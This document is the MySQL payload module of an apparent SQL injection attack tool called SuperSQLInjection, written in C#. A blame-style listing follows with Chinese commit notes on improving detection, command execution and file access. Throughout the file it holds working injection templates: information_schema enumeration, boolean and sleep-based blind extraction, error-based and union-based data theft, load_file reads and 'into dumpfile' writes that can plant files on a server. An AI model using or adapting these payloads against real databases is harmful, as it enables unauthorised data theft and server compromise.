SuperSQLInjectionV1/SuperSQLInjection/payload/MySQL.cs

using System;
using System.Collections.Generic;
using System.Text;
using tools;

namespace SuperSQLInjection.payload
{
    class MySQL
    {
        //加载对应配置(需要读取的环境变量)
        public static String path = "config/vers/mysql.txt";
        public static List<String> vers = FileTool.readFileToList(path);

        public static String char_length = "(select char_length({data}))";
        
        //数据库数量
        public static String dbs_count = "(select count(1) from information_schema.schemata)";
        //表数量
        public static String tables_count = "(select count(1) from information_schema.tables where table_schema='{dbname}')";
        //列数量
        public static String columns_count = "(select count(1) from information_schema.columns where table_schema='{dbname}' and table_name='{table}')";


        //获取数据库名
        public static String db_value = "(select schema_name from information_schema.schemata limit {index},1)";
        //获取表名称
        public static String table_value = "(select table_name from information_schema.tables where table_schema='{dbname}' limit {index},1)";
        //获取列名称
        public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";

        public static String bool_length = "char_length({data})";
        public static String bool_value = "ascii(mid({data},{index},1))";
        public static String mid_value = "(mid({data},{index},1))";

        //获取数据库数量bool方式
        public static String bool_db_count = " " + dbs_count + ">{len}";

        //获取表数量bool
        public static String bool_tables_count = " " + tables_count + ">{len}";
        
        //获取列数量bool
        public static String bool_columns_count = " " + columns_count + ">{len}";
        

        //多字符长度判断
        //public static String mu_value = "(hex(convert((mid({data},{index},1)) using UTF8)))";
        
        //多字符处理判断
        public static String ord_value = "(ord(mid({data},{index},1)))";

        //bool方式字符长度判断
        public static String ver_length = " "+ bool_length + ">{len}";

        //bool方式字符长度判断
        public static String char_len= "char_length({data})";

        //bool方式获取值
        public static String ver_value = " "+ bool_value + ">{len}";

        //bool方式获取值
        public static String bool_ord_value = " " + mid_value + ">{len}";

        //获取行数据bool
        public static String data_value = "(select {columns} from `{dbname}`.`{table}` limit {index},1)";

        //获取数据bool,加入orderby解决盲注获取数据时，获取到的数据每一行可能不对称的可能
        public static String bool_data_value = "(select {column} from (select {columns} from `{dbname}`.`{table}` limit {index},1)tmp)";

        //union获取数据条数
        public static String data_count = "(select count(1) from `{dbname}`.`{table}`)";

        //bool判断数据条数
        public static String bool_datas_count = " " + data_count + ">={len}";

        //union获取值
        public static String union_value = " 1=2 union all select {data}";

        //error方式
        public static String error_value = " (select 1 from (select count(1),concat(({data}),floor(rand(0) xor 1))x from information_schema.tables group by x)a)";
        
        public static String hex = "(select hex({data}))";
        public static String hex_value = "(select hex(convert(({data}) using UTF8)))";

        public static String substr_value = "(select substr({data},{start},{len}))";
        public static String getBoolDataBySleep(String data,int maxTime)
        {
            return " (select 1 from (select(sleep(" + maxTime + "-(if((" + data + ">{len}), 0, " + maxTime + ")))))" + Tools.RandStr(6) + ")";
        }

        public static String getBoolCountBySleep(String data, int maxTime)
        {
            return " (select 1 from (select(sleep(" + maxTime + "-(if((" + data + "), 0, " + maxTime + ")))))" + Tools.RandStr(6) + ")";
        }
        

        /// <summary>
        /// 生成联合查询的列的字符串，如1,2,3,用于union注入
        /// </summary>
        /// <param name="columnsLen">列长度</param>
        /// <param name="showIndex">显示列是第几列</param>
        /// <param name="fill">其他列填充字符</param>
        /// <param name="columns">填充显示列的对应列集合数据</param>
        /// <param name="table">表明</param>
        /// <param name="dbName">数据库名</param>
        /// <param name="dbName">limit下标,没有填写-1</param>
        /// <returns></returns>
        public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex, String fill, List<String> columns, String table, String dbName, int limit)
        {
            StringBuilder sb = new StringBuilder();
            for (int i = 1; i <= columnsLen; i++)
            {

                if (i == showIndex)
                {
                    sb.Append(concatMySQLColumnStr(columns) + ",");
                }
                else
                {

                    sb.Append(fill + ",");
                }
            }
            sb.Remove(sb.Length - 1, 1).ToString();

            if (!Tools.checkEmpty(dbName))
            {
                sb.Append(" from `" + dbName + "`.");
                if (!Tools.checkEmpty(table))
                {
                    sb.Append(table);
                }

            }
            else
            {
                if (!Tools.checkEmpty(table))
                {
                    sb.Append(" from `" + table+ "`");
                }
            }
            if (limit >= 0)
            {
                sb.Append(" limit " + limit + ",1");

            }
            return sb.ToString();
        }

        public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String fill,String data)
        {
            StringBuilder sb = new StringBuilder();
            for (int i = 1; i <= columnsLen; i++)
            {

                if (i == showIndex)
                {
                    sb.Append(concatMySQLColumn(data) + ",");
                }
                else
                {

                    sb.Append(fill+",");
                }
            }
            return sb.Remove(sb.Length - 1, 1).ToString();
        }

        public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
        {
            StringBuilder sb = new StringBuilder(" 1=1 union select ");
            for (int i = 1; i <= columnsLen; i++)
            {

                if (i == dataIndex)
                {
                    sb.Append(Tools.strToHex(content,"UTF-8")+",");
                }
                else
                {

                    sb.Append(fill+",");
                }
            }
            sb.Remove(sb.Length - 1, 1);
            sb.Append(" into dumpfile '"+path+"'");
            return sb.ToString();
        }

        public static String creatMySQLColumnsStrByError(List<String> columns, String table, String dbName, int limit)
        {
            StringBuilder sb = new StringBuilder();
            sb.Append(concatMySQLColumnStr(columns));

            if (!Tools.checkEmpty(dbName))
            {
                sb.Append(" from `" + dbName + "`.");
                if (!Tools.checkEmpty(table))
                {
                    sb.Append(table);
                }
            }
            else
            {
                if (!Tools.checkEmpty(table))
                {
                    sb.Append(" from `" + table+ "`");
                }
            }
            if (limit >= 0)
            {
                sb.Append(" limit " + limit + ",1");

            }
            return sb.ToString();
        }


        public static String creatMySQLColumnsStr(List<String> columns, String table, String dbName, int limit)
        {

            StringBuilder sb = new StringBuilder("(select concat_ws(0x242424,");
            foreach (String c in columns) {
                sb.Append("ifnull("+c + ",0x20),");
            }
            if (columns.Count > 0)
            {
                sb.Remove(sb.Length - 1, 1);
            }
            sb.Append(")");
            if (!Tools.checkEmpty(dbName))
            {
                sb.Append(" from `" + dbName + "`.");
                if (!Tools.checkEmpty(table))
                {
                    sb.Append(table);
                }
            }
            else
            {
                if (!Tools.checkEmpty(table))
                {
                    sb.Append(" from `" + table+ "`");
                }
            }
            if (limit >= 0)
            {
                sb.Append(" limit " + limit + ",1)");

            }
            return sb.ToString();
        }

        
        /// <summary>
        /// 生成查询列数据
        /// </summary>
        /// <param name="columns">列明</param>
        /// <returns></returns>
        public static String concatMySQLColumnStr(List<String> columns)
        {
            StringBuilder sb = new StringBuilder("concat(0x5e5e21,concat_ws(0x242424,");
            for (int i = 0; i < columns.Count; i++)
            {
                if (columns.Count > 1)
                {

                    sb.Append("ifnull("+columns[i] + ",0x20),");
                }
                else
                {
                    sb.Append("ifnull(" + columns[i]+ ",0x20)");
                }

            }
            if (columns.Count > 1)
            {
                sb.Remove(sb.Length - 1, 1);
            }
            sb.Append("),0x215e5e)");

            return sb.ToString();

        }  

        /// <summary>
        /// 生成查询列数据
        /// </summary>
        /// <param name="columns">列明</param>
        /// <returns></returns>
        public static String concatMySQLColumn(String column)
        {
            StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
            sb.Append(column);
            sb.Append(",0x215e5e)");
            return sb.ToString();

        }

   
        public static String getBoolDataPayLoad(String column,List<String> columns, String dbName, String table, int index)
        {
            String data = bool_data_value.Replace("{column}", column).Replace("{columns}", String.Join(",",columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
            return data;
        }
        /// <summary>
        /// 反射条调用，加载显示支持的文件操作
        /// </summary>
        /// <returns></returns>
        public static List<String> getShowCanDoFile() {
            List<String> list = new List<String>();
            list.Add("MySQL Load_File读文件");
            list.Add("MySQL Union写文件");
            return list;
        }


    }
}
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								using System;
 								using System.Collections.Generic;
 								using System.Text;
 								using tools;
 								namespace SuperSQLInjection.payload
 								{
-												update20181204

20181204 V1.0 正式版---
优化注入配置文件，降低误报和漏报。
优化执行命令，文件读取模块解决部分情况无法执行命令或无法读取文件的情况。
修复SQLServer通过错误显示方式无法获取数据的情况。
优化部分代码。
增加自动识别注入记录，可将一个URL每一个参数存在的盲注、报错注入、Union注入都记录下来，可灵活选择对应的注入类型。

											
										
										
											2018-12-04 23:30:51 +08:00
+								    class MySQL
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								    {
 								        //加载对应配置(需要读取的环境变量)
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
+								        public static String path = "config/vers/mysql.txt";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        public static List<String> vers = FileTool.readFileToList(path);
 								        public static String char_length = "(select char_length({data}))";
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        //数据库数量
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
+								        public static String dbs_count = "(select count(1) from information_schema.schemata)";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        //表数量
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
+								        public static String tables_count = "(select count(1) from information_schema.tables where table_schema='{dbname}')";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        //列数量
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
+								        public static String columns_count = "(select count(1) from information_schema.columns where table_schema='{dbname}' and table_name='{table}')";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //获取数据库名
 								        public static String db_value = "(select schema_name from information_schema.schemata limit {index},1)";
 								        //获取表名称
 								        public static String table_value = "(select table_name from information_schema.tables where table_schema='{dbname}' limit {index},1)";
 								        //获取列名称
 								        public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
 								        public static String bool_length = "char_length({data})";
 								        public static String bool_value = "ascii(mid({data},{index},1))";
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
+								        public static String mid_value = "(mid({data},{index},1))";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //获取数据库数量bool方式
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String bool_db_count = " " + dbs_count + ">{len}";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //获取表数量bool
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String bool_tables_count = " " + tables_count + ">{len}";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //获取列数量bool
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String bool_columns_count = " " + columns_count + ">{len}";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //多字符长度判断
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
+								        //public static String mu_value = "(hex(convert((mid({data},{index},1)) using UTF8)))";
 								        //多字符处理判断
 								        public static String ord_value = "(ord(mid({data},{index},1)))";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //bool方式字符长度判断
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String ver_length = " "+ bool_length + ">{len}";
-												update20181114

update20181114

											
										
										
											2018-11-14 00:01:17 +08:00
 								        //bool方式字符长度判断
 								        public static String char_len= "char_length({data})";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        //bool方式获取值
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String ver_value = " "+ bool_value + ">{len}";
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
 								        //bool方式获取值
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String bool_ord_value = " " + mid_value + ">{len}";
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        //获取行数据bool
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								        public static String data_value = "(select {columns} from `{dbname}`.`{table}` limit {index},1)";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
-												20190111 V1.0 正式版---
修复PostgreSQL，盲注部分情况下某些字段作为排序字段会出错，导致无法获取数据的情况。
修复PostgreSQL、SQLite、DB2显错和Union注入获取时，部分数据类型无法转换和存在空值导致无法获取的情况。
修复日志处，复制payload报错问题。

											
										
										
											2019-01-10 22:27:46 +08:00
+								        //获取数据bool,加入orderby解决盲注获取数据时，获取到的数据每一行可能不对称的可能
 								        public static String bool_data_value = "(select {column} from (select {columns} from `{dbname}`.`{table}` limit {index},1)tmp)";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //union获取数据条数
-												update20190823

update20190823

											
										
										
											2019-08-23 16:34:43 +08:00
+								        public static String data_count = "(select count(1) from `{dbname}`.`{table}`)";
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        //bool判断数据条数
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String bool_datas_count = " " + data_count + ">={len}";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //union获取值
-												update 20181117

库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 00:46:02 +08:00
+								        public static String union_value = " 1=2 union all select {data}";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        //error方式
-												update20190823

update20190823

											
										
										
											2019-08-23 16:34:43 +08:00
+								        public static String error_value = " (select 1 from (select count(1),concat(({data}),floor(rand(0) xor 1))x from information_schema.tables group by x)a)";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								        public static String hex = "(select hex({data}))";
 								        public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        public static String substr_value = "(select substr({data},{start},{len}))";
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
+								        public static String getBoolDataBySleep(String data,int maxTime)
 								        {
 								            return " (select 1 from (select(sleep(" + maxTime + "-(if((" + data + ">{len}), 0, " + maxTime + ")))))" + Tools.RandStr(6) + ")";
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        }
-												update20181216

20181216 V1.0 正式版---
修复SQLServer延时盲注paylaod缺少and导致语句错误无法获取数据的问题。
修复优化自动识别注入漏报和选择类型错误的问题。
修复bool延时注入时，获取数据判断数据大小方式不正确的问题。
修复错误显示注入获取数据时，数据可能被HTML编码或转义到导致数据不正确的问题。
修复延时注入在正常页面响应速度非常快的情况下，由于计数器可能有误差，导致判断值不正确，而无法正确获取数据（设置了20*time毫秒的误差值）。
修复读取文件，执行命令无法使用延时判断问题。
优化配置文件。
新增支持注入PostgreSQL，目前可获取数据，执行命令和文件操作稍后版本更新。

											
										
										
											2018-12-16 01:24:43 +08:00
+								        public static String getBoolCountBySleep(String data, int maxTime)
 								        {
 								            return " (select 1 from (select(sleep(" + maxTime + "-(if((" + data + "), 0, " + maxTime + ")))))" + Tools.RandStr(6) + ")";
 								        }
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        /// <summary>
 								        /// 生成联合查询的列的字符串，如1,2,3,用于union注入
 								        /// </summary>
 								        /// <param name="columnsLen">列长度</param>
 								        /// <param name="showIndex">显示列是第几列</param>
 								        /// <param name="fill">其他列填充字符</param>
 								        /// <param name="columns">填充显示列的对应列集合数据</param>
 								        /// <param name="table">表明</param>
 								        /// <param name="dbName">数据库名</param>
 								        /// <param name="dbName">limit下标,没有填写-1</param>
 								        /// <returns></returns>
 								        public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex, String fill, List<String> columns, String table, String dbName, int limit)
 								        {
 								            StringBuilder sb = new StringBuilder();
 								            for (int i = 1; i <= columnsLen; i++)
 								            {
 								                if (i == showIndex)
 								                {
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								                    sb.Append(concatMySQLColumnStr(columns) + ",");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								                else
 								                {
 								                    sb.Append(fill + ",");
 								                }
 								            }
 								            sb.Remove(sb.Length - 1, 1).ToString();
 								            if (!Tools.checkEmpty(dbName))
 								            {
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								                sb.Append(" from `" + dbName + "`.");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                if (!Tools.checkEmpty(table))
 								                {
 								                    sb.Append(table);
 								                }
 								            }
 								            else
 								            {
 								                if (!Tools.checkEmpty(table))
 								                {
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								                    sb.Append(" from `" + table+ "`");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								            }
 								            if (limit >= 0)
 								            {
 								                sb.Append(" limit " + limit + ",1");
 								            }
 								            return sb.ToString();
 								        }
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
+								        public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String fill,String data)
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        {
 								            StringBuilder sb = new StringBuilder();
 								            for (int i = 1; i <= columnsLen; i++)
 								            {
 								                if (i == showIndex)
 								                {
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								                    sb.Append(concatMySQLColumn(data) + ",");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								                else
 								                {
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
+								                    sb.Append(fill+",");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								            }
 								            return sb.Remove(sb.Length - 1, 1).ToString();
 								        }
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
+								        public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        {
-												update20181117

20181117 V1.0 正式版---
库表列新增全选和反选功能。
优化底部日志显示，增加色彩。
修改配置文件，优化payload语句以及测试语句，提高自动识别准确率，降低误报和漏报。
注意：此版本开始注入标记不在是替换and 1=1，而且替换1=1这个位置的语句，所以在手工标记时，记得保留and或者or。

											
										
										
											2018-11-17 01:28:02 +08:00
+								            StringBuilder sb = new StringBuilder(" 1=1 union select ");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								            for (int i = 1; i <= columnsLen; i++)
 								            {
 								                if (i == dataIndex)
 								                {
 								                    sb.Append(Tools.strToHex(content,"UTF-8")+",");
 								                }
 								                else
 								                {
-												更新版本

更新版本

											
										
										
											2018-08-21 15:43:31 +08:00
+								                    sb.Append(fill+",");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								            }
 								            sb.Remove(sb.Length - 1, 1);
 								            sb.Append(" into dumpfile '"+path+"'");
 								            return sb.ToString();
 								        }
 								        public static String creatMySQLColumnsStrByError(List<String> columns, String table, String dbName, int limit)
 								        {
 								            StringBuilder sb = new StringBuilder();
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								            sb.Append(concatMySQLColumnStr(columns));
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
 								            if (!Tools.checkEmpty(dbName))
 								            {
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								                sb.Append(" from `" + dbName + "`.");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                if (!Tools.checkEmpty(table))
 								                {
 								                    sb.Append(table);
 								                }
 								            }
 								            else
 								            {
 								                if (!Tools.checkEmpty(table))
 								                {
-												update 20190110

20190110 V1.0 正式版---
修复MySQL，由于库名或表名存在特殊字符，如“-”时，导致SQL语法错误而无法获取数据的情况，使用`转义符。
修复代理验证完成后，未关闭socket连接问题。
修复MySQL部分情况下判断Union注入使用注释符错误的问题。
优化自动识别注入时填充的字符长度，防止列长度较高时，GET请求长度超出限制。

											
										
										
											2019-01-10 14:14:54 +08:00
+								                    sb.Append(" from `" + table+ "`");
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								                }
 								            }
 								            if (limit >= 0)
 								            {
 								                sb.Append(" limit " + limit + ",1");
 								            }
 								            return sb.ToString();
 								        }
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								        public static String creatMySQLColumnsStr(List<String> columns, String table, String dbName, int limit)
-												添加项目文件。

											
										
										
											2017-03-13 16:12:15 +08:00
+								        {
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								            StringBuilder sb = new StringBuilder("(select concat_ws(0x242424,");
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								            foreach (String c in columns) {
-												update20190811

update20190811

											
										
										
											2019-08-10 18:34:52 +08:00
+								                sb.Append("ifnull("+c + ",0x20),");
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
+								            }
 								            if (columns.Count > 0)
 								            {
-												update20190319

20190319 V1.0 正式版---
修复变量无法问题。
修复MySQL部分情况下，当字段出现空值无法获取数据的问题。

											
										
										
											2019-03-19 02:35:36 +08:00
+								                sb.Remove(sb.Length - 1, 1);
-												20181206

20181206 V1.0 正式版---
修改mysql获取的环境的配置文件，增加hash字段名为authentication_string的查询。
修复使用了betweent and饶过时，显错注入无法获取数据的情况。
修复MySQL显错注入，获取数据的每一列结果可能不对应的问题和部分情况可能出现中文乱码的情况。

											
										
										
											2018-12-06 17:58:01 +08:00
